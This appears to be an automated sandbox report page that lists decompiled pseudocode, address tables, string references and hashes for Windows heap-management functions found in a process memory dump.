((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 029C2BF3
MZER, xrefs: 0297B880
HEAP[%wZ]: , xrefs: 029C2BDB

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]: $MZER
API String ID: 0-114103810
Opcode ID: 10fe5fad1382a535fa9c07278dc066c00a1ff8cc19e36152c8ae5928522534d9
Instruction ID: 20e140cf10af5933bd43f61c7439ba4b9e6b1e9e3d660bd9f3d97fe434df5a88
Opcode Fuzzy Hash: 10fe5fad1382a535fa9c07278dc066c00a1ff8cc19e36152c8ae5928522534d9
Instruction Fuzzy Hash: 1761E474600241DFDB18CF28C495BAABBE6FF44718F24856EE8498F641D730E881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0297A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0297A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0297DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E02999730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E02A1A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E02999660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0295B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E02977D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E02A1138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E02977D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E02977D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E02A11582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E02977D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E02977D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E02A11582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E029AD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x0297a229
0x0297a231
0x0297a23f
0x0297a242
0x0297a244
0x0297a24c
0x0297a255
0x0297a25a
0x0297a25f
0x029c1c76
0x029c1c78
0x029c1c7e
0x029c1c7f
0x029c1c81
0x029c1c82
0x029c1c84
0x029c1c89
0x029c1c8b
0x029c1c9e
0x029c1c9e
0x029c1cab
0x029c1cb2
0x00000000
0x029c1cb2
0x029c1c8d
0x029c1c92
0x00000000
0x00000000
0x029c1c94
0x029c1c98
0x00000000
0x00000000
0x00000000
0x029c1c98
0x0297a265
0x0297a265
0x0297a266
0x0297a26f
0x0297a270
0x0297a276
0x0297a277
0x0297a279
0x0297a27e
0x0297a282
0x029c1db5
0x029c1dbb
0x029c1dc1
0x029c1dc5
0x029c1de4
0x029c1de9
0x029c1dc7
0x029c1ddc
0x029c1de1
0x029c1def
0x029c1df3
0x029c1df7
0x029c1dfe
0x029c1e06
0x0297a302
0x0297a308
0x0297a308
0x0297a288
0x0297a28d
0x0297a294
0x029c1cc1
0x0297a29a
0x0297a29a
0x0297a29a
0x0297a29f
0x029c1ccb
0x029c1cd1
0x029c1cd8
0x029c1cea
0x029c1cea
0x029c1cd8
0x0297a2a9
0x0297a2af
0x0297a2bc
0x029c1cfd
0x0297a2c2
0x0297a2c2
0x0297a2c2
0x0297a2c7
0x029c1d07
0x029c1d0d
0x029c1d14
0x029c1d1f
0x029c1d21
0x029c1d2c
0x029c1d2c
0x029c1d2c
0x029c1d47
0x029c1d47
0x029c1d14
0x0297a2cd
0x0297a2d2
0x0297a2d9
0x029c1d5a
0x0297a2df
0x0297a2df
0x0297a2df
0x0297a2e4
0x029c1d69
0x029c1d6b
0x029c1d76
0x029c1d76
0x029c1d76
0x029c1d91
0x029c1d91
0x0297a2ea
0x0297a2f0
0x0297a2f5
0x029c1da8
0x029c1dad
0x029c1dad
0x0297a2fd
0x0297a300
0x00000000

Strings

HEAP: , xrefs: 029C1DE4
`, xrefs: 029C1C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 029C1DF9
HEAP[%wZ]: , xrefs: 029C1DD7

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 4cf67bfd7995428f836dfa285b86117db36a6e38f64c30c2e61f618228bcadda
Instruction ID: aabec2828b29e50477d0dbfaa7cd9c62bc3bee83ff4e1897baa52ef0ed103e7f
Opcode Fuzzy Hash: 4cf67bfd7995428f836dfa285b86117db36a6e38f64c30c2e61f618228bcadda
Instruction Fuzzy Hash: 135105312056809FE722DB68C844F6B77E9FF80B54F290868F959CB292DB34D940CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02A149A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02A14A4A, 02A14A5D, 02A14A5F, 02A14AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 02A14A61
This is located in the %s field of the heap header., xrefs: 02A14AD6
HEAP[%wZ]: , xrefs: 02A14A3D, 02A14AB7

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 7d6ac716ca18ade3640cdcdf53daf5993e41bb761e06baf49007b4b58012f92c
Instruction ID: 3c36f65ea67d5f39771fa597b4a5aed2dec1dda47174f25ff5e932a1950149d7
Opcode Fuzzy Hash: 7d6ac716ca18ade3640cdcdf53daf5993e41bb761e06baf49007b4b58012f92c
Instruction Fuzzy Hash: 1431F031200110EFE711DB6CC895F6673A9EB48778F164055F80ADB2E0DB70E980EB68

Uniqueness

Uniqueness Score: -1.00%

Function 029799BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E029799BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E02A0FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E02A1A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E029AD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0295B150();
										} else {
											E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0295B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x2a46378 = 1;
											asm("int3");
											 *0x2a46378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0297A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0297A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0297BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E02A1A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0297A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0297A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E029AD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0295B150();
								} else {
									E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0295B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x2a46378 = 1;
									asm("int3");
									 *0x2a46378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E02A0FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E02A1A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E029AD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0295B150();
													} else {
														E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0295B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x2a46378 = 1;
														asm("int3");
														 *0x2a46378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0297A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0297A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0297BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E02A1A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E029AD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0295B150();
													} else {
														E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0295B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x2a46378 = 1;
														asm("int3");
														 *0x2a46378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0297A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0297A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0297BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0297BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x029799ca
0x029799cc
0x029799df
0x029799e3
0x029799f8
0x029799fb
0x029799fb
0x00000000
0x02979a48
0x02979a48
0x02979a4c
0x02979a51
0x02979a55
0x02979a61
0x02979a66
0x02979a68
0x029c1457
0x029c145c
0x029c145c
0x02979a68
0x02979a6e
0x02979a71
0x02979a74
0x02979a76
0x029c1466
0x029c1469
0x029c1469
0x029c146c
0x029c146e
0x029c1471
0x029c1474
0x029c1477
0x029c1479
0x029c159c
0x029c159c
0x029c159d
0x029c15a6
0x029c15ab
0x029c15ab
0x00000000
0x029c15ab
0x029c147f
0x029c1481
0x00000000
0x00000000
0x029c148a
0x029c148d
0x029c1493
0x029c1495
0x029c14c0
0x029c14c0
0x029c14c3
0x029c14c6
0x029c14c8
0x029c14cb
0x029c14cf
0x029c14f2
0x029c14f2
0x029c14f5
0x029c14f8
0x029c1501
0x029c1508
0x029c150b
0x029c150e
0x029c1510
0x029c1513
0x029c1515
0x029c1515
0x029c1518
0x029c1518
0x029c1513
0x029c1521
0x029c1525
0x029c152a
0x029c152d
0x029c1530
0x029c1532
0x029c1539
0x029c153d
0x029c155d
0x029c1562
0x029c153f
0x029c1555
0x029c155a
0x029c1570
0x029c1577
0x029c157c
0x029c1582
0x029c1585
0x029c1589
0x029c158b
0x029c1592
0x029c1593
0x029c1593
0x029c1589
0x029c1530
0x00000000
0x029c14f8
0x029c14d5
0x029c14da
0x029c14dc
0x00000000
0x029c14de
0x029c14e8
0x00000000
0x029c14e8
0x029c1497
0x029c1497
0x029c14a4
0x029c14a4
0x029c14a7
0x029c14a9
0x029c14ab
0x029c14ab
0x029c149c
0x029c149e
0x029c14a0
0x029c14b0
0x029c14b0
0x00000000
0x029c14a2
0x029c14a2
0x00000000
0x029c14a2
0x029c14a0
0x029c14b3
0x029c14bb
0x00000000
0x029c14bb
0x029c1495
0x02979a7c
0x02979a7c
0x02979a7f
0x02979a7f
0x02979a82
0x02979a84
0x02979a87
0x02979a8a
0x02979a8d
0x02979a8f
0x029c166a
0x029c166a
0x029c166b
0x029c1674
0x00000000
0x029c1674
0x02979a95
0x02979a97
0x00000000
0x00000000
0x02979aa0
0x02979aa3
0x02979aa9
0x02979aab
0x02979ad7
0x02979ad7
0x02979ada
0x02979add
0x02979adf
0x02979ae2
0x02979ae6
0x02979b22
0x02979b27
0x02979b29
0x00000000
0x02979b2b
0x029c15be
0x00000000
0x029c15be
0x02979b29
0x02979ae8
0x02979ae8
0x02979aeb
0x02979aee
0x029c15cb
0x029c15d2
0x029c15d5
0x029c15d7
0x029c15da
0x029c15dc
0x029c15dc
0x029c15dc
0x029c15da
0x029c15e5
0x029c15e9
0x029c15ee
0x029c15f1
0x029c15f3
0x029c15f9
0x029c1600
0x029c1604
0x029c1624
0x029c1629
0x029c1606
0x029c161c
0x029c1621
0x029c1637
0x029c163e
0x029c1643
